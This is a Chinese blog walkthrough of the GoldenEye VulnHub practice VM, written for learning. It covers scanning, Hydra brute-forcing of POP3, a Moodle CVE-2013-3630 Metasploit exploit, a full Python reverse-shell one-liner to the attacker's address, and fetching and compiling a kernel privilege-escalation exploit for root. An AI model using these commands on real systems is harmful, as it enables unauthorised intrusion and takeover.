渗透测试靶机学习----GoldenEye

最新推荐文章于 2024-07-25 11:12:14 发布
最新推荐文章于 2024-07-25 11:12:14 发布
阅读量402 收藏 2
点赞数 1
文章标签: 学习 服务器 前端 安全 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60584088/article/details/133625646
版权

渗透测试靶机----GoldenEye

准备工作:

准备kali 一台,下载好GoldenEye靶机,,在VMware选项中选择网络,启用nat模式

启动靶机:

  • 靶机显示需要登录,平平无奇

在这里插入图片描述

  • 这个时候启动我们的kali,先扫描靶机的ip地址
  • nmap -sn 192.168.217.0/24
    在这里插入图片描述
  • 如图,发现靶机地址为192.168.217.140

信息收集

先来一波端口扫描,查看开放的端口
在这里插入图片描述
发现了开放25和80端口,25暂时不知道什么情况,优先处理80端口,直接访问网页,发现了提示:
在这里插入图片描述
这里他提示了一条线索,它说进入到/sev-home/目录中。
在这里插入图片描述
但是访问给的目录,发现需要登录,没有密码,束手无策。继续回上个页面查看信息

查看页面源码
在这里插入图片描述
这里注释了一个js文件,那么肯定有问题,点进去查看这个js文件
在这里插入图片描述
js文件中也有一段注释内容,经过翻译,可以确定:提供了两个人名Boris、Natalya
并且下面存在一段编码值,尝试解码(直接使用burp的解码工具即可)得到了InvincibleHack3r
这里就怀疑这个密文和前面的两个人名的关联性,尝试拿去给定的目录登录,成功登录!!!通过翻译页面显示的内容,发现了 pop3 服务
在这里插入图片描述

pop3

  • 上面我们已经确定了存在pop3服务,而我们扫描出来的端口并没有提示,那么需要重新扫描全端口,获取pop3服务的端口

在这里插入图片描述

  • 这里又跑出来55006和55007端口,那么继续----
  • nmap -sS -sV -T5 -A -p55006,55007 192.168.217.140

在这里插入图片描述

  • 看到mail server,可以确定这是邮件服务器,而且在之前js文件中它提示了,目前使用的是默认账户密码,那么就可以尝试登录了
  • 而登录密码还未知,可以尝试使用暴力破解,在上一步中找到的用户名“boris”,通过Hydra暴力破解pop3服务
    在这里插入图片描述
    在这里插入图片描述

最后报出来了两组密码:
login: natalya password: bird
login: boris password: secret1!

登录 pop3,直接查看

  • 使用nc 尝试登录
  • 在这里插入图片描述
  • 这里成功登录boris用户,并且直接发现了三份邮件,逐一查看
    在这里插入图片描述
  • 这里直接翻译,没获取到实打实的有用信息,但是第二份邮件提示natalya可以破坏密码,那么我们切换登录用户,接着同样的方法登录natalya用户
邮件内容:

第二份中提示到:
URL:severnaya-station.com/gnocertdir
用户信用是:
用户名:xenia
密码:RCP90rulez!
而在其他邮件中依然没有有价值的地方,直接忽略
按照给定的提示,我们设置好hosts文件:gedit /etc/hosts
直接访问给定目录。

访问网页

在这里插入图片描述

moodle
  • 这是一个开源CMS,,网页首页需要登录,那么前面第二份邮件提供的用户密码就应该是为这个登录准备的
    在这里插入图片描述
  • 成功登录!!!
    在这里插入图片描述

各种功能尝试点点,发现一份邮件,用户名doak
在这里插入图片描述
出现了用户名,那么把这个用户名可以放在字典里,接着爆破

  • 爆破得到的密码为:goat
    再次尝试登录
    在这里插入图片描述
    发现了一份邮件,点开,存在用户名和密码,那么思路就清晰了,用这个用户名接着登录网页
    成功登录!!,并且在新用户中我们发现和之前不同,存在一个 s3cret.txt文件
    在这里插入图片描述
  • 既然给出了文件,那么一定会有提示,文件内容是一张图片,将这个图片直接下载到本地,binwalk,strings,exiftool挨个分析一波
    在这里插入图片描述
  • 图片中存在编码值,那么肯定有问题,尝试解码,—> xWinter1995x!
  • 文件中提到这是admin用户登录,那么尝试admin登录网页
    在这里插入图片描述
到这里没什么思路了,但是我们之前还有一个利用点没有用,那就是cms,已知Moodle cms,尝试搜索相关exp----->CVE-2013-3630 漏洞可利用!

那么直接msf启动!

set username admin —设置用户名:admin
set password xWinter1995x! —设置密码:xWinter1995x!
set rhost severnaya-station.com —设置:rhosts severnaya-station.com
set targeturi /gnocertdir —设置目录: /gnocertdir
set payload cmd/unix/reverse —设置payload:cmd/unix/reverse
set lhost 192.168.217.140
run!!
但是直接run发现没有成功?,这是因为对方需要修改执行PSpellShell,由于使用的是powershell命令,需要在设置中修改,直接在页面中打开设置,Plugins–Text editors—TinyMCE HTML editor
在这里插入图片描述
直接修改为PSpellShell。
直接run就可以了

  • 另外还有一种反弹shell的方法,直接可以获得shell
  • 在"Settings"–>“Site administration”–>“Server”–>“System paths”–>"Path to aspell"进行命令执行
  • kali上监听端口,通过在home->my profile->blogs->add a new entry中新建文章,随便输入字符,点击"Toggle Spellchecker"之后就会反弹到shell
  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.217.129",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    记得修改本地ip和端口,kali开启监听

内核提权在这里插入图片描述

  • 这里查看权限,直接谷歌搜索Linux ubuntu 3.13.0-32 exploit
  • 可以直接发现exp 37292
  • CVE(CAN) ID: CVE-2015-1328
  • kali可以直接搜索:searchsploit 37292
    在这里插入图片描述
  • 这里直接 cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/
  • 文件需要启动编译器,查看gcc,cc是否存在,幸运的是,cc存在!
  • 在这里插入图片描述
  • 直接打开本地的37292.c文件,将第143行将gcc改为cc –gedit 37292.c
  • 保存退出!

本地启动一个http服务:python -m http.server 8888
靶机shell进行下载:wget http://192.168.217.129:89/37292.c
在这里插入图片描述
下载成功,那么直接梭哈
cc -o exp 37292.c —C语言的CC代码编译点c文件
chmod +x exp —编译成可执行文件,并赋权
./exp
id

在这里插入图片描述

成功提权,那么查看flag信息:cat /root/.flag.txt,成功获取到flag信息!

至此,打靶成功!!

参考:点我

久恙502
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
记一次GoldenEye靶场渗透测试过程
c_programj的博客
09-16 1553
记一次GoldenEye靶场渗透测试过程 靶场下载连接: 链接:https://pan.baidu.com/s/1qSU-0h8S-HyV-tkhGvCe3A 提取码:n2hq 下载完成之后,在VMware直接打开虚拟机,选择该.ova文件即可。 KALI攻击机:192.168.43.126 GoldenEye靶机:192.168.43.27 一、信息收集 1、使用nmap进行信息收集,查找同网段下的主机:namp -sP 192.168.43.0/24 Nmap -sP 扫描所在网段存货主机(可以扫到所在
vulnhub靶场——GOLDENEYE: 1 渗透记录
ShenZ的博客
02-10 2120
vulnhub—GOLDENEYE: 1 vulnhub靶场——GOLDENEYE: 1 渗透记录 About Description 一、信息搜集 二、网站渗透 三、Moodle漏洞利用
1、GoldenEye-靶机-百个项目计划
Labi的博客
01-14 1221
大家好,因为自己是一个刚入门网安不久的新人,现在想通过打一些靶机来进行学习,这里的计划是通过百个项目来进行实操,巩固自己的基础。发文也是记录一下自己的开始,文章会写的比较详细,让0基础的小白跟着做也会。本文仅用于技术讨论与研究,如用作非法用途作者概不负责。GoldenEye也是我们新手入门必打靶机,那我们就开始进入正文吧。
靶机渗透】GoldenEye靶机渗透练习
serendipity1130的博客
08-30 686
1.主机发现:arp-scan -l,发现靶机ip为192.168.225.153 2.扫描端口,开启了55007端口为pop3服务 nmap 192.168.225.153 -sV -sC -Pn -n -v -T5 -p- 3.访问网址,查看源代码,发现terminal.js,进行访问发现两个用户名:boris和Natalya 进行unicode解码,获得密码:InvincibleHack3r 4.尝试登录:http://192.168.225.153/sev-home/ 5..
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3393
vulnhub靶场{GoldenEye-v1靶场实战}
Goldeneye靶机实操
weixin_43999483的博客
02-03 748
Goldeneye靶机实操信息搜集webshell用户提权 新手上路 请多多指教 信息搜集 接好靶机 发现IP为:192.168.8.144 发现 80端口开着 试试打开 用户是Boris无疑,密码是&#开头,盲猜unicode格式,站长之家一波,百度翻译的插件也可以 由于系统大小写敏感用户名被坑了~~hhh 多次尝试用户名为:boris 密码不变 /sev-home/登录后台 发现有用的信息,pop3端口被开启,转了一圈chrome发现后台刻意留下的两个账号。 按照pop3端口被打开的思
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
spellchecker.php 漏洞,CVE-2013-3630 Moodle Spellcheck 远程命令执行漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_32586767的博客
04-13 667
### This module requires Metasploit: http//metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'require 'rexml/document'class Metasploit4 < Msf...
渗透测试】小知识点总结
m0_52923241的博客
03-01 4757
目录kali自带字典目录vim文本编辑器linux通过修改/etc/hosts文件 添加IP地址与域名的映射CVE-2013-3630——Moodle在linux下如何本地开启端口Linux中查看进程状态信息命令:psCVE-2018-7600——Drupaldirtycow脏牛提权Python SimpleHTTPServer:linux远程下载文件到本地scpftpwgetGCC编译CVE-2016-10033——PHPmailer远程代码执行漏洞111端口rpcbind漏洞python tty:终端控
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3150
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
【6 GoldenEye渗透笔记
勿山几已
04-10 251
本文仅用于技术讨论与研究,不做任何导向,对于所有笔记中复现的这些终端、服务器或者实验环境,均为自行搭建的公开靶场,请勿在现实环境中模仿、操作。本文涉及到的工具仅就用到的方面做简要描述,如果想了解更详细的信息,请自行参阅其他技术资料。如果列出的技术用于其他任何目标,作者概不负责。
渗透项目(一):GodlenEye
Ays.Ie的博客
10-15 1231
今天开始写渗透学习笔记,第一个渗透项目:GoldenEye,大佬勿喷!!
CVE-2013-2551样本分析及漏洞利用和防御
weixin_34290631的博客
09-19 1323
本文讲的是CVE-2013-2551样本分析及漏洞利用和防御, 0x0 写在前面 VUPEN团队在Pwn2Own 2013黑客大赛上使用漏洞攻破Windows 8环境下的IE10,随后在其博客上公开了技术细节。根据VUPEN描述,该漏洞产生于VGX.DLL模块,在VML语言中处理图形标签的stroke子元素的dashstyle存在安全隐患 微软在安全公...
【C++进阶学习】第八弹——红黑树的原理与实现——探讨树形结构存储的最优解
2301_80220607的博客
07-22 2397
【C++进阶】+【高阶数据结构】——红黑树的原理与实现——超详解,适合小白学习了解!!!
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
最新发布
urhero的专栏
07-25 298
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值